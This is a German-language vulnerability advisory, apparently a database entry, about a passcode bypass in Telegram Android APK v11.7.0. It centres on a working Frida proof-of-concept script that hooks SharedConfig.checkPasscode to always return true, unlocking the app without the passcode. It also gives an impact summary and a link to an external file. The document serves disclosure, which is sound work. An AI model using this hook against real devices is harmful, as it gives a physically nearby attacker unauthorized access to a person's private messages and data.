
Frida-basierter Proof-of-Concept, der Authentifizierungsumgehung in Telegram Android demonstriert, indem SharedConfig.checkPasscode gehooked wird, um immer true zurückzugeben, was unbefugten Zugriff ermöglicht.
Ein Problem in der SharedConfig-Klasse von Telegram Android APK v.11.7.0 ermöglicht einem physisch nahen Angreifer, die Authentifizierung zu umgehen und Berechtigungen zu eskalieren, indem er den Rückgabewert der checkPasscode-Methode manipuliert.
Authentifizierungsumgehung
Telegram
Telegram Android APK v.11.7.0
org.telegram.messenger.SharedConfig
Java.perform(function() {
// Locate the SharedConfig class in the target application
var PassCodeActivity = Java.use('org.telegram.messenger.SharedConfig');
// Hook the checkPasscode method to modify its behavior
PassCodeActivity.checkPasscode.implementation = function(passcode) {
// Bypass the actual passcode check by always returning true
return true;
};
});
https://drive.google.com/file/d/1-lW1IQiCyj-8UXZOTedYPGPhQwfMLX4M/view?usp=sharing
Diese Schwachstelle ist ein Problem der clientseitigen Authentifizierungsumgehung. Sie betrifft Benutzer, die auf die Passcode-Funktion angewiesen sind, um sensible Daten zu schützen oder den Zugriff auf bestimmte App-Funktionen einzuschränken. Durch Ausnutzung dieses Fehlers kann ein physisch naher Angreifer den Passcode-Überprüfungsprozess manipulieren, die Authentifizierung umgehen und unbefugten Zugriff auf geschützte Bereiche der App erhalten. Dies könnte zur Offenlegung sensibler Benutzerdaten oder zu unbefugten Aktionen innerhalb der Anwendung führen.